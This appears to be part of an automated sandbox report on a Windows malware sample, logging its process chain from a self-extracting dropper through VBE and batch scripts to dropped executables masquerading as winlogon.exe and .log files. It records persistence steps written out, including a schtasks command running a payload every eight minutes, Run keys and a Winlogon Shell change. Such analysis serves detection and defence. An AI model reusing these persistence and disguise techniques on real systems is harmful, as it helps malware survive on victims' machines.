Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
Source: unknown Process created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Source: unknown Process created: C:\Recovery\winlogon.exe "C:\Recovery\winlogon.exe"
Source: C:\Recovery\winlogon.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7 Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7 Jump to behavior
Source: H9gMIu2HXi.exe Static file information: File size 1811992 > 1048576
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: H9gMIu2HXi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sgG.cs .Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class4.cs .Net Code: H86
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sgG.cs .Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class4.cs .Net Code: H86
Compiles C# or VB.Net code
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline" Jump to behavior
File is packed with WinRar
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4597250 Jump to behavior
PE file contains sections with non-standard names
Source: H9gMIu2HXi.exe Static PE information: section name: .didat
Source: work.exe.0.dr Static PE information: section name: .didat
Source: dwartg.exe.3.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A407F0 push ecx; ret 0_2_00A40803
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3FEFC push eax; ret 0_2_00A3FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003307F0 push ecx; ret 3_2_00330803
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032FEFC push eax; ret 3_2_0032FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073F640 push ecx; ret 4_2_0073F653
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073EB78 push eax; ret 4_2_0073EB96
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BABFB02 pushad ; ret 8_2_00007FFD9BABFB03
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8163 push ebx; ret 8_2_00007FFD9BAB816A
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC21EE0 pushfd ; ret 8_2_00007FFD9BC21EE1
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC30185 push ebx; retf 8_2_00007FFD9BC301F2
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC28951 push 8B485E2Eh; iretd 8_2_00007FFD9BC28956
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BACFB02 pushad ; ret 43_2_00007FFD9BACFB03
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8163 push ebx; ret 43_2_00007FFD9BAC816A

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
Drops PE files
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\tnEMlbYs.log Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Recovery\winlogon.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\vybNluDs.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\aEtIhTbg.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\WslZMRrk.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\MFrsFgjH.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\lKwWBiIK.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\TDfrhvdw.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\LdxTVLQK.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\tRVOBpwv.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\RAtJMMZA.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\rGzNBWQu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe File created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\BudDliLc.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\vybNluDs.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\tnEMlbYs.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\lKwWBiIK.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\TDfrhvdw.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\RAtJMMZA.log Jump to dropped file
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\MFrsFgjH.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\LdxTVLQK.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\BudDliLc.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\tRVOBpwv.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\rGzNBWQu.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\aEtIhTbg.log Jump to dropped file
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\WslZMRrk.log Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
